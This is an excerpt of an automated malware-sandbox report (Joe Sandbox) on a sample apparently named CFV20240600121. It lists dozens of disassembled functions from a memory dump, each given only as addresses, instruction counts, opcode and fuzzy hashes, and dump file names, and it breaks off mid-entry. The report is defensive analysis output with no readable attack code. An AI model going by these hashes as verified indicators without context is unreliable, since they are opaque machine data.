                                        • Instruction ID: b4ca8dee13614111acc0f8ada6a8478173af63f19d14e94c6c3749e983426b44
                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                        • Instruction Fuzzy Hash: 9C319A31600609EFD721CFA9C884F6ABBF9FF85758F1045A9E5129B690E770EE42CB50
                                        Function 0144E609 Relevance: .1, Instructions: 86COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4a76ec7a380dd72760479e4f551414a503d284e3a02f1a4ee8573c3cd356d6c
                                        • Instruction ID: 1c7bcd78f4e0c6ed72b2ed3e84eaaf8d282ebe97d15e6cf84e34ce8b066c31d4
                                        • Opcode Fuzzy Hash: a4a76ec7a380dd72760479e4f551414a503d284e3a02f1a4ee8573c3cd356d6c
                                        • Instruction Fuzzy Hash: 2231A275A00205EFEB14CF1CC8849AE77B6FF88304F55845AE80DAB3A1E775E951CB90
                                        Function 014506F1 Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49d098a78b7ab17e050a3877c8b77de93a3c5839deafc150d0534b984af38358
                                        • Instruction ID: f5d6efc0b32d1668ef890186e3406c66e4b2b74cae14b9770cffd22484f44bb6
                                        • Opcode Fuzzy Hash: 49d098a78b7ab17e050a3877c8b77de93a3c5839deafc150d0534b984af38358
                                        • Instruction Fuzzy Hash: 8F219175900229DBCF20DF59C881ABEB7F8FF48744B55006AF941AB354E738AD42CBA0
                                        Function 0145019F Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d87852f5f6807fe9bf31665b63733b676996faf8750ded4e8a518004a425be9
                                        • Instruction ID: b0537067ae8a9e88bcda4bd41abc57bdd9c461cc042007f6e46779f899b2d1ea
                                        • Opcode Fuzzy Hash: 3d87852f5f6807fe9bf31665b63733b676996faf8750ded4e8a518004a425be9
                                        • Instruction Fuzzy Hash: F621EA75600605AFD711DB6CC844F6AB7E8FF88384F1400AAF908DB7A1D634ED00CBA8
                                        Function 01450283 Relevance: .1, Instructions: 74COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0fcadc8723023593bbea07d3a5656c43c6ea598810341b30b9c298db5d3ea011
                                        • Instruction ID: 54e2319e5d0afa51e3ff97e6ed0c540a755b05c9cfae4d91157db85207981bf5
                                        • Opcode Fuzzy Hash: 0fcadc8723023593bbea07d3a5656c43c6ea598810341b30b9c298db5d3ea011
                                        • Instruction Fuzzy Hash: F821B0769043469BD721EF6DD948B5BBBECAF90344F08045BBE80C72A2D734D909C6A2
                                        Function 013F2835 Relevance: .1, Instructions: 73COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2288b5e793ec24a6882431a126ecd9e747434223753ed0107c0bb2468d3176f
                                        • Instruction ID: c18adba66e144119abd3618eee281d935000cb8f94f26f248d75109e072be6b5
                                        • Opcode Fuzzy Hash: a2288b5e793ec24a6882431a126ecd9e747434223753ed0107c0bb2468d3176f
                                        • Instruction Fuzzy Hash: EC21FC31645695DBE322576CCD08B263FD5AF45778F2803A9FA60DB7F2D778C8028241
                                        Function 0140A30B Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b693d79437ad6d40c9cd266c72dee57885079febab3227f5a3486f1e4eec7b3
                                        • Instruction ID: 8305af8f4393986e543e8989e6f9b05fc55f484a9e0fa6e3279cb5569de76ba4
                                        • Opcode Fuzzy Hash: 5b693d79437ad6d40c9cd266c72dee57885079febab3227f5a3486f1e4eec7b3
                                        • Instruction Fuzzy Hash: 0121A979211B119FCB25DF2AC900B56B7F5BF48B08F24846DA509CBBA1E331E842CF94
                                        Function 0148A49A Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6d46eaee8eca4c7c6dc6e75a49a4f58de23c60238c5908873e08dd1a0268ab2
                                        • Instruction ID: 4af1d969f4f60194bba65e1ef03310a614ff90b708328f8e7de67f73db82c856
                                        • Opcode Fuzzy Hash: a6d46eaee8eca4c7c6dc6e75a49a4f58de23c60238c5908873e08dd1a0268ab2
                                        • Instruction Fuzzy Hash: 7B11A772340B11BFD722665D9C41F6BB6999BD5B60F71002BB718DB2A0EBB0DC0187A5
                                        Function 01450946 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63f319faa7e916ad4bd9c9cc3b87b6e74daf9dc9956d38e0d359d95b3726b100
                                        • Instruction ID: 3f88b3404dcb71d16432f7bb328c35d9b808bf1faca7484a315d6c06d0559a77
                                        • Opcode Fuzzy Hash: 63f319faa7e916ad4bd9c9cc3b87b6e74daf9dc9956d38e0d359d95b3726b100
                                        • Instruction Fuzzy Hash: 272107B5E00249ABCB60DFAAD9819AEFBF8FF98B00F10012FE405A7365D7709941CB50
                                        Function 014680A8 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                        • Instruction ID: 0ccd2928d056daa2b28706165b1e8464927c83037559741d408b6a1aab7e1af6
                                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                        • Instruction Fuzzy Hash: 9A219D72A0030AEFDF128F98CC40BAEBBB9EF88318F20045AF901A7260D734D9518B50
                                        Function 01400124 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                        • Instruction ID: ab826b1ff2f63b9110415022bcc9375fa57d1c76804499bafd08397bcc19d286
                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                        • Instruction Fuzzy Hash: A511B272601605AFD7239F5ACC41FAABBB9EB90794F10403AF6049F2E0D672ED45CB50
                                        Function 013D8770 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 87d91e2976205558ab78fadfd89988e711ad38199f4d3ca1dc2f92ea4960765f
                                        • Instruction ID: ff55cd5e50c453772a440dd24285c4483bc04f0713c592fef37e0be4aebafb6b
                                        • Opcode Fuzzy Hash: 87d91e2976205558ab78fadfd89988e711ad38199f4d3ca1dc2f92ea4960765f
                                        • Instruction Fuzzy Hash: E311C8377016159BDB12CF4ED4C0A56BBE9AF46718B1680ADED089F304D6B2E901C790
                                        Function 0140AAEE Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                        • Instruction ID: 08a7d64b73593764e9c191de2b067774d0faa56e1957f3129491dd6d646ca0b9
                                        • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                        • Instruction Fuzzy Hash: 07219A72600B41DBD7229F5EC540A66BBF6EB94B10F25897EE64A877A0C630EC01CB40
                                        Function 013D80E9 Relevance: .1, Instructions: 66COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 438df1c3f64807a4d705d28d2ff2511769120775fe07d3583491887d9405c1af
                                        • Instruction ID: a00e9d23a03ff19af115714160c544dddbfce896c462050110967321f76f903e
                                        • Opcode Fuzzy Hash: 438df1c3f64807a4d705d28d2ff2511769120775fe07d3583491887d9405c1af
                                        • Instruction Fuzzy Hash: 55215E76A00209DFCB14CF68D581AAEBBB5FB88318F2441ADD505A7351C771AD0ACB90
                                        Function 0140674D Relevance: .1, Instructions: 65COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc8b5877561e71f91155abc7561086cfbeb1561522a94da8356420b46bc81f21
                                        • Instruction ID: 13fe769c376c4f9bdb12a181f140d79b173eb8428737ad1113e4a2fda3205904
                                        • Opcode Fuzzy Hash: fc8b5877561e71f91155abc7561086cfbeb1561522a94da8356420b46bc81f21
                                        • Instruction Fuzzy Hash: 5C218E75600A01EFD7218F6AC840B66B7F8FF84650F05882EE59BC72A0DA30A960CB60
                                        Function 01466870 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 55f0b2b26cfb8895835b3e00b61348260aad1ba275adb1cfe221d6053d869461
                                        • Instruction ID: 742b50b70a64874894a61aa4d685305b564f0a0e73518e0f451978b71b3469f4
                                        • Opcode Fuzzy Hash: 55f0b2b26cfb8895835b3e00b61348260aad1ba275adb1cfe221d6053d869461
                                        • Instruction Fuzzy Hash: 3B11A332240614EFC722DB6DC940F9A77ACEF95758F12406AF605DB271DA70E905CBD1
                                        Function 013FE8C0 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9cfcfa2d2949b1279e37cde7b2d9be69a1105eef091f9873b10fef6eaed870b
                                        • Instruction ID: 33dc36995925fb0516120cc71555dbc31cd1b3694e1841f0f9d2582ae4779cea
                                        • Opcode Fuzzy Hash: b9cfcfa2d2949b1279e37cde7b2d9be69a1105eef091f9873b10fef6eaed870b
                                        • Instruction Fuzzy Hash: B1110C367041145BCB19DB29CC45A6B725BEFD5674B26853ED623CB3B0D9309812C791
                                        Function 014066B0 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 19205a8aed3beb2b3d8d3f88eb64294501708976aa5b8f598fa7598f3339de95
                                        • Instruction ID: 98bdd7ec362a8ecc99c59b7ddc01f6d4ac0e9b31e1392c485d8696bf460a2403
                                        • Opcode Fuzzy Hash: 19205a8aed3beb2b3d8d3f88eb64294501708976aa5b8f598fa7598f3339de95
                                        • Instruction Fuzzy Hash: AA11E376A01215DFCB26CF9EC584A5BBBF8EF84610F03807AD9069B3A0E670DD10CB90
                                        Function 0149A8E4 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                        • Instruction ID: 12452ba92f21de470363813f299b141033e66a84aecc85eac83b6c442f8dfa9f
                                        • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                        • Instruction Fuzzy Hash: BF110436A00919AFDF19CB58C805B9EBBF5FF94210F15826AEC45A7390E631BD01CB80
                                        Function 0145E7E1 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                        • Instruction ID: 368517ad329a9674170496474247b2100302db6c6e29e8f39e5418d760dc5cac
                                        • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                        • Instruction Fuzzy Hash: 3E119E32600601EFE7619F49C840B57FBA6EB55754F09842EEE09BB272DB31DE40DB90
                                        Function 013F27ED Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7eeb399925d85b5db88aefc3cad17505eb688a23ffc08df3e9a6b67eef8e603a
                                        • Instruction ID: ee75aa7f32d414a86bf1901352a0dbe4bef72393a165d45bb34edceba5dac7fe
                                        • Opcode Fuzzy Hash: 7eeb399925d85b5db88aefc3cad17505eb688a23ffc08df3e9a6b67eef8e603a
                                        • Instruction Fuzzy Hash: 13012631245689AFE316A26ED898F277F8DEF84758F1500BAFA40CB6E1DA34DC01C261
                                        Function 013D4690 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 19485939744fe7e2e5f52885b7cbca1f8b62d60915113eecdbef3451c0ca5b23
                                        • Instruction ID: e58571496fc6c72db6b694525fd99c1077b9166d627b461bc1673939cfb69a45
                                        • Opcode Fuzzy Hash: 19485939744fe7e2e5f52885b7cbca1f8b62d60915113eecdbef3451c0ca5b23
                                        • Instruction Fuzzy Hash: 5311C237340655AFDB25CF5DE840F567BA8EB96B6CF064119F9248BA90C370E810CF60
                                        Function 014A4B00 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40398f467d7a927459dfe7ed844df9bb5d1a415df0d6210a1df0af9e337ac9a8
                                        • Instruction ID: ac8fa400411ab6d9e18a5e58ded2b7b428c906e936d505f7bb5f50f08ae1096b
                                        • Opcode Fuzzy Hash: 40398f467d7a927459dfe7ed844df9bb5d1a415df0d6210a1df0af9e337ac9a8
                                        • Instruction Fuzzy Hash: A511C636200611DFD721DA6DD844F5BF7A5FFE4711F5E441AE642877A0DA70A802C790
                                        Function 01406620 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09f3da4b7f943110bf63b9e17a1fe1cc4eabeb2db1d45668c1d1466351bb4ba3
                                        • Instruction ID: 9d4a5c7c0f4611b8df5649300738b697dcadf5bf755e8355331049b75e4d1907
                                        • Opcode Fuzzy Hash: 09f3da4b7f943110bf63b9e17a1fe1cc4eabeb2db1d45668c1d1466351bb4ba3
                                        • Instruction Fuzzy Hash: 2411A072A00715ABDB229F5ADD80B5EFBB8EF44640F56086ADA06A7390D730A9118B60
                                        Function 013FEA2E Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: feaee020dd81514be25454ee88c2f30627db37418b4b4a099dbf51a662f451b9
                                        • Instruction ID: de965df97b9ac1f87f109fb72b4737b15a8e2e3c1ea504e059feb424572c2e3c
                                        • Opcode Fuzzy Hash: feaee020dd81514be25454ee88c2f30627db37418b4b4a099dbf51a662f451b9
                                        • Instruction Fuzzy Hash: 82019E716002099FDB25DB29E548F1ABBF9EB95718F25817EE2058F270C7B0ED46CB90
                                        Function 013FE53E Relevance: .1, Instructions: 55COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                        • Instruction ID: 6c9e5e545f22105d8e85200b6dfc0a84ff92409ab6534fa590edccce387e170c
                                        • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                        • Instruction Fuzzy Hash: C611C6716057CADBE722971C8948B2637D8AF8474CF1A00F6DE4587BA2F338C846C252
                                        Function 0145E75D Relevance: .1, Instructions: 54COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                        • Instruction ID: b69752f8acd4d41962e504d1631c7ddbc80fdb91634cb0adbe9898d9365c5796
                                        • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                        • Instruction Fuzzy Hash: 4E01D232600605BFE7619F59C900F5BFAA9EB91754F05802AEE09AB272E771DE41C790
                                        Function 013CA250 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                        • Instruction ID: 378c97f35879fe1b8c53d3f3f1b5c9b36d96cbb1b1f6b5101a6f1e075bda0f1f
                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                        • Instruction Fuzzy Hash: 1C01263140473A9BDB318F19D840A327BFAEF55B68700852DFC998B681E732D800CB60
                                        Function 014A4940 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d78b999bd4bdad26d2a200a91c9ac73700a1b767ab958a1e1db4cfe9533d07c4
                                        • Instruction ID: 9ba00e598b1743604581731bb627994f8ace3688067d8079815d9344b37d2770
                                        • Opcode Fuzzy Hash: d78b999bd4bdad26d2a200a91c9ac73700a1b767ab958a1e1db4cfe9533d07c4
                                        • Instruction Fuzzy Hash: 810108725412119FC332DF2C8804E17BBACEBA5374B5E4266E968572F2D670D811C780
                                        Function 0144E1D0 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: baca526258919455ebafc68d3e41e99fa24ff03bab74ce89359a635e12d887df
                                        • Instruction ID: 1fccd188a870efbf353f8ce4aea9e27e18e664e9e38ba2bbc029df11a10f8eb6
                                        • Opcode Fuzzy Hash: baca526258919455ebafc68d3e41e99fa24ff03bab74ce89359a635e12d887df
                                        • Instruction Fuzzy Hash: 2311AD32241641EFDB16EF19DD91F16BBB8FF54B48F2400AAEA059B6A1C235ED01CA90
                                        Function 013D6259 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ba64e3efdbf16235d892656897055d47390fb578a9a5d90079c6c9068304423
                                        • Instruction ID: fcc0832e5190e12c363ae3588f669b47c04244133d0ee5f36f8eaca26747b9d9
                                        • Opcode Fuzzy Hash: 5ba64e3efdbf16235d892656897055d47390fb578a9a5d90079c6c9068304423
                                        • Instruction Fuzzy Hash: 8A119A71641228ABDB25EF65CC42FE9B2B4BF18710F6041D9A329E61E0DA709E81CF84
                                        Function 01456050 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8c49804b0e0bb40ce9bc0f4e25fcf3f4486b76ab47875408e4ffc6c08c35d61
                                        • Instruction ID: cb796b163abb9cd97d513453c4d3a86d8af4163127cb9df07dfd340f5cbebd69
                                        • Opcode Fuzzy Hash: d8c49804b0e0bb40ce9bc0f4e25fcf3f4486b76ab47875408e4ffc6c08c35d61
                                        • Instruction Fuzzy Hash: 12112D73900119ABCB11DB95CC84DDFB77CEF58258F054166E906E7221EA34EA55CBE0
                                        Function 013D208A Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                        • Instruction ID: fbf81bff9b8e8e4543ad03f6d2f059b631f85f3ae45539f8b8d1991ba021b12a
                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                        • Instruction Fuzzy Hash: A4014C332001108BDF118E6DE880B53777BBFD4704F9A41AAED018F256DA71CC81C790
                                        Function 01466500 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b84974c02a527b4e0ec5f38a7617ed7be1a60ef1e3ba162ef5975c82217e12c3
                                        • Instruction ID: 5623ebe2890da00748755d2da427081e318372d84df4d39f65cea3419ace3b28
